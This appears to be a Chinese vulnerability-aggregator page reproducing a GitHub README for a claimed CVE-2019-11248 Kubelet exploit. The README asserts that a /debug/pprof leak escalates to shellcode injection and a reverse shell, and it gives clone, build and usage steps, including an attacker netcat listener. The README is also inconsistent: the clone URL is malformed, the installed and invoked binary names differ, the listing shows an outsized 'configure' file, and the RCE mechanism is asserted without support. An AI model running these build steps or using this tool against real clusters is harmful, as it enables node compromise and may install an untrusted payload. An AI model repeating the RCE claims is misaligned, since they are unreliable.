关联漏洞
标题:
Google Kubernetes 信息泄露漏洞
(CVE-2019-11248)
描述:Google Kubernetes是美国谷歌(Google)公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。 Google Kubernetes中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。以下产品及版本受到影响:Google Kubernetes 1.15.0之前版本,1.14.4之前版本,1.13.8之前版本,1.12.10之前版本。
介绍
# CVE-2019-11248 Exploitation PoC (RCE)
## Overview
This repository contains a **proof-of-concept (PoC)** exploit for **CVE-2019-11248**, a medium-severity vulnerability in Kubernetes' Kubelet, which can lead to **Remote Code Execution (RCE)** under certain conditions. The vulnerability stems from the exposure of the `/debug/pprof` endpoint on the Kubelet's healthz port. This PoC showcases a novel method to escalate the initial information disclosure into a full-blown RCE attack, utilizing unprotected memory and internal Kubelet data.
### What's New?
While previous discussions around this CVE primarily focused on **information leakage** and **denial-of-service (DoS)** attacks, this PoC demonstrates a **previously unused attack vector** that allows for code injection and execution on the underlying system by leveraging the exposed Kubelet memory addresses and profiling data.
## CVE Details
- **CVE ID:** CVE-2019-11248
- **Vulnerability Type:** Information Disclosure / RCE
- **Affected Versions:**
- Kubernetes Kubelet versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10.
- **Severity:** Medium (Information Disclosure), Escalated to **High** (RCE).
- **Attack Vector:** Network (Unauthenticated access to Kubelet’s healthz port).
### Vulnerability Summary
The `/debug/pprof` endpoint is exposed over the Kubelet's **unauthenticated healthz port** (typically `10248`), allowing remote attackers to access profiling data such as memory usage, goroutine stacks, and heap dumps. Normally, this endpoint is intended for debugging purposes, but its exposure can lead to **information disclosure** and the leakage of sensitive memory addresses.
In this PoC, we demonstrate how the attacker can use this information to inject malicious code into the Kubelet process. By taking advantage of memory structures and leveraging the Kubelet's internal profiling data, this attack results in **remote code execution** on the Kubernetes node.
## Exploitation Details
This PoC illustrates a sophisticated exploitation strategy that escalates the information disclosure vulnerability into a **full RCE attack**. By using memory leaks from the `/debug/pprof` endpoint, the attacker can locate vulnerable memory regions and inject shellcode into the Kubelet process, enabling code execution.
### Novel Approach
- **Memory Leak Exploitation:** The PoC automates the retrieval of heap dumps and memory profiles from the `/debug/pprof` endpoint to locate critical memory regions where code can be injected.
- **Shellcode Injection:** After identifying a suitable memory region, the PoC injects shellcode into the Kubelet’s process, exploiting the leaked memory addresses.
- **RCE Payload Execution:** The injected shellcode is designed to give the attacker control over the Kubernetes node, enabling arbitrary command execution.
## Setup & Usage
### Prerequisites
- A Kubernetes environment with a vulnerable version of Kubelet (prior to 1.15.0, 1.14.4, 1.13.8, or 1.12.10).
- C compiler (e.g., `g++`).
- Network access to the Kubelet’s healthz port (commonly `10248`).
- Basic knowledge of Kubernetes internals and memory manipulation techniques.
### Compilation
1. Clone the repository:
```bash
git clone hhttps://github.com/nop2nop/cve-2019-11248.git
cd cve-2019-11248
```
2. Compile the PoC exploit:
```bash
./configure
make
make install
```
The exploit code is installed as `/usr/local/bin/cve-2019-11248`
### Running the PoC
1. Ensure that the Kubelet's healthz port is accessible from your machine.
2. Execute the compiled exploit by passing the Kubelet’s healthz port URL:
```bash
cve-2019-11248-exploit http://<kubelet-ip>:10248 local_ip local_port
```
`local_ip` and `local_port` are attacker's machine reverse shell listener.
For example, for reverse shell, run from your server `nc -l 33000`. Then `local_port` is *33000* and `local_ip` is *your_server_ip*. Make sure 33000 is accessible and the ip is routable. For home routers, port forwarding is required.
3. The PoC will start by querying the exposed `/debug/pprof` endpoint to retrieve profiling data.
4. Once the memory profiling data is collected, the PoC identifies vulnerable memory regions and injects the RCE payload.
5. Upon successful exploitation, the PoC will execute the injected code, giving the attacker control over the Kubernetes node.
### Expected Output
When the exploit successfully completes:
- The PoC will output detailed profiling information, including the memory addresses of critical sections.
- The shellcode will be injected into the Kubelet process.
- A **reverse shell** or arbitrary code execution will be initiated on the target node, giving the attacker remote control of the Kubernetes environment.
## Exploit Details
### Memory Profiling Exploitation
This PoC takes advantage of the `/debug/pprof` endpoint to leak Kubelet memory addresses, which can be used to identify writable memory regions. The attacker can then use this knowledge to inject shellcode directly into the Kubelet process.
### Shellcode Injection
By combining the memory leak with specific characteristics of the Go runtime used by Kubelet, the PoC injects malicious shellcode into the process’s memory space. This shellcode is executed to achieve **remote code execution** on the Kubernetes node, potentially allowing for container escape or full cluster compromise.
### Code Execution
Once the memory is successfully manipulated, the PoC executes the injected payload. The payload can be customized, but by default, it opens a reverse shell connection, allowing the attacker to execute arbitrary commands on the node.
## Mitigation & Patching
To mitigate this vulnerability:
1. **Upgrade** to a patched version of Kubernetes Kubelet (1.15.0, 1.14.4, 1.13.8, or 1.12.10).
2. **Secure the healthz port** by preventing unauthenticated access, either by using proper network segmentation or by disabling the debugging endpoints.
3. Use **firewall rules** and **network policies** to limit access to critical components like the Kubelet.
## Disclaimer
This PoC is provided for **educational purposes only**. It is intended to demonstrate how this vulnerability could be exploited in certain conditions. Unauthorized use of this exploit in production environments may result in legal consequences. The authors do not take responsibility for any misuse of the information provided.
## License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
文件快照
[4.0K] /data/pocs/ce1c9ea65831d402570e5184f6205c2eda2b3cc5
├── [ 460] CMakeLists.txt
├── [1.2M] configure
├── [ 11K] exploit.c
├── [ 764] pwnkernel.c
└── [6.4K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。